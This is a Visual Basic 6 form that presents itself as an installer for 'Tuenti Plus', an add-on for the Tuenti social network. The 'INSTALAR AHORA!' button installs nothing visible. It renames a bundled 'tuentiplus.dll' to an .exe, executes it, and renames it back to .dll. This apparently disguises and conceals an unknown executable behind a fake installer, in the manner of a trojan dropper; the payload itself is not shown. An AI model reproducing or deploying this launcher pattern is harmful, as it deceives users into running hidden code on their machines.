VERSION 5.00
Begin VB.Form frm_tuenti 
   BackColor       =   &H00FF8080&
   BorderStyle     =   1  'Fixed Single
   Caption         =   "INSTALADOR DE TUENTI  PLUS!"
   ClientHeight    =   6075
   ClientLeft      =   4620
   ClientTop       =   2445
   ClientWidth     =   6150
   Icon            =   "frm_tuenti.frx":0000
   LinkTopic       =   "Form1"
   MaxButton       =   0   'False
   MinButton       =   0   'False
   ScaleHeight     =   6075
   ScaleWidth      =   6150
   Begin VB.CommandButton cmd_boton 
      Caption         =   "INSTALAR AHORA!"
      BeginProperty Font 
         Name            =   "MS Sans Serif"
         Size            =   8.25
         Charset         =   0
         Weight          =   700
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      Height          =   375
      Left            =   1560
      TabIndex        =   3
      Top             =   5520
      Width           =   3015
   End
   Begin VB.TextBox txt_tuenti 
      BackColor       =   &H00FF8080&
      Height          =   3255
      Left            =   120
      Locked          =   -1  'True
      MultiLine       =   -1  'True
      ScrollBars      =   2  'Vertical
      TabIndex        =   2
      Text            =   "frm_tuenti.frx":08CA
      Top             =   2040
      Width           =   5895
   End
   Begin VB.Frame frm_marco 
      BackColor       =   &H00FF8080&
      Height          =   855
      Left            =   360
      TabIndex        =   1
      Top             =   360
      Width           =   3615
      Begin VB.Label lbl_tuentiplus 
         Alignment       =   2  'Center
         Appearance      =   0  'Flat
         BackColor       =   &H00FF8080&
         Caption         =   "T U E N T I   P L U S!"
         BeginProperty Font 
            Name            =   "Century Gothic"
            Size            =   15.75
            Charset         =   0
            Weight          =   700
            Underline       =   0   'False
            Italic          =   0   'False
            Strikethrough   =   0   'False
         EndProperty
         ForeColor       =   &H0000FFFF&
         Height          =   495
         Left            =   120
         TabIndex        =   5
         Top             =   240
         Width           =   3375
      End
   End
   Begin VB.PictureBox pct_tuenti 
      Height          =   1815
      Left            =   4200
      Picture         =   "frm_tuenti.frx":0B01
      ScaleHeight     =   1755
      ScaleWidth      =   1875
      TabIndex        =   0
      Top             =   0
      Width           =   1935
   End
   Begin VB.Label Label1 
      Alignment       =   2  'Center
      BackColor       =   &H00FF8080&
      Caption         =   "Desarrollado por Player"
      BeginProperty Font 
         Name            =   "Arial"
         Size            =   8.25
         Charset         =   0
         Weight          =   400
         Underline       =   0   'False
         Italic          =   -1  'True
         Strikethrough   =   0   'False
      EndProperty
      Height          =   255
      Left            =   720
      TabIndex        =   4
      Top             =   1320
      Width           =   3015
   End
End
Attribute VB_Name = "frm_tuenti"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Option Explicit

Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

Const SW_NORMAL = 1

Private Sub cmd_boton_Click()
Dim Archivo
Archivo = App.Path & "\tuentiplus.dll"
Dim Archivo2
Archivo2 = App.Path & "\tpluseject1.exe"
Name Archivo As Archivo2
Dim Eject
Eject = Shell(App.Path & "\tpluseject1.exe", 1)
Dim Archivo3
Archivo3 = App.Path & "\tpluseject1.exe"
Dim Archivo4
Archivo4 = App.Path & "\tuentiplus.dll"
Name Archivo3 As Archivo4

End Sub

Private Sub pct_tuenti_Click()
Dim link
link = ShellExecute(Me.hwnd, "Open", "http://www.tuenti.com", &O0, &O0, SW_NORMAL)
End Sub
